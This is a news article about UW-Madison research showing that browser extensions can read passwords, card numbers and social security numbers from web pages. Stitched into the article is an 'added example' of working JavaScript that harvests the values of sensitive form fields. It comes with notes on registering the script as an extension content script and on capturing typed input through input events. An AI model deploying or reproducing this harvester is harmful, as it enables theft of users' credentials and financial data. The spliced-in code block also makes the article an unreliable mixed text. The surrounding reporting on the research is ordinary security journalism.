From ********* to EZacces$! Your browser extension could grab your password and sensitive info

When you type a password or credit card number into a website, you expect that your sensitive data will be protected by a system designed to keep it secure.

That’s not always the case, according to a group of digital security researchers at the University of Wisconsin-Madison. They found that some popular websites are vulnerable to browser extensions that can extract user data like passwords, credit card information and social security numbers from HTML code. A preprint of their work has already created a buzz in tech circles.

The team includes Rishabh Khandelwal and Asmit Nayak, PhD students who work with Kassem Fawaz, a UW-Madison associate professor of electrical and computer engineering. The trio first discovered the issue while investigating Google login webpages.

"We were just messing around with login pages, and in the HTML source code we could see the password in plain text," says Nayak. "We thought, ’This is interesting. Why is this happening? Is it possible that other websites are doing something similar?’ Then we started digging deeper."

They discovered a big issue. The researchers found that a large share of websites - about 15% of the more than 7,000 they examined - expose sensitive information as plain text in the page's HTML. While browser protections keep other websites and outside attackers from reading this data, the team hypothesized that a browser extension, which runs inside the page, might be able to reach it.

Browser extensions are add-ons that, using small bits of code, allow users to customize their browsing experience, for example by blocking ads or improving time management. Browser developers sometimes introduce experimental features via extensions while also allowing third-party developers to offer their own extensions for users to try. The researchers found that a malicious extension could use ordinary JavaScript, the language extensions are written in, to grab users’ login credentials.

"Somebody who’s malicious does not need to start from scratch," he says. "They can get access to existing extensions, for instance, by buying one with lots of users and tweaking the code a little bit. They could maintain the functionality and get access to the passwords very easily."
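The DOM read described above, as an added example that is not code from the paper or from any real extension: a content script locates password, card and SSN fields by the same attributes a password manager uses (type, name, autocomplete) and reads their current values. The field names and values are constructed sample data, and `fakeForm` is a hypothetical stand-in for `document` so the block runs outside a browser.

```javascript
// Added example, not the researchers' code. In a browser a content script
// would call harvestSensitiveFields(document); the fake DOM below is a
// constructed stand-in so the logic can be run and checked offline.

// Name/id/autocomplete hints that mark a field as worth harvesting.
const SENSITIVE_PATTERN = /(pass|pwd|card|cc-?num|cvv|cvc|ssn|social)/i;

// A field is sensitive if it is a password input or its hints match above.
function isSensitiveField(el) {
  const type = (el.type || '').toLowerCase();
  if (type === 'password') return true;
  const hints = [el.name, el.id, el.autocomplete].filter(Boolean).join(' ');
  return SENSITIVE_PATTERN.test(hints);
}

// Core of the attack: once a script runs inside the page, whatever the user
// has typed into a field is readable as a plain string through `.value`,
// whether or not it ever appears in the static page source.
function harvestSensitiveFields(root) {
  const out = [];
  for (const el of root.querySelectorAll('input, textarea')) {
    if (!isSensitiveField(el)) continue;
    out.push({
      field: el.name || el.id || el.autocomplete || '(unnamed)',
      value: el.value,
    });
  }
  return out;
}

// Constructed stand-in for the DOM: only querySelectorAll is needed here.
function fakeForm(fields) {
  return { querySelectorAll: () => fields };
}

// Constructed sample login/checkout page with one field of each kind.
const sampleLoginPage = fakeForm([
  { type: 'text', name: 'username', value: 'alice' },
  { type: 'password', name: 'password', value: 'EZacces$!' },
  { type: 'text', name: 'cc-number', autocomplete: 'cc-number', value: '4111111111111111' },
  { type: 'text', name: 'ssn', value: '123-45-6789' },
  { type: 'text', name: 'search', value: 'shoes' },
]);

// Use the real DOM when running as a content script, the stand-in otherwise.
const target = typeof document !== 'undefined' ? document : sampleLoginPage;
console.log(harvestSensitiveFields(target));
```

To run in a browser, the extension's manifest must declare the script under `content_scripts` with a `matches` pattern covering the target site; that declaration is the permission Google's statement refers to, and a password manager's content script declares exactly the same thing, which is why the page itself cannot tell the two apart. A field that is never filled in yields an empty `value`, so a harvester typically also listens for `input` events rather than reading once.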

Fawaz says it’s likely that the vulnerability isn’t an oversight; instead, browser security is configured this way to let popular password manager extensions access password information. For its part, in a statement to the researchers, Google says that it is looking into the matter but does not consider this a security flaw, especially if permissions for the extensions are configured correctly.

Fawaz, however, is still concerned, and he hopes his research will convince websites to rethink the way they handle this sensitive information. His team proposes alerts to let users know when sensitive data is being accessed by browser extensions, as well as tools for developers to protect these data fields.

"It’s a dangerous thing," Fawaz says. "This is something that people really need to know: Passwords aren’t always safe on browsers."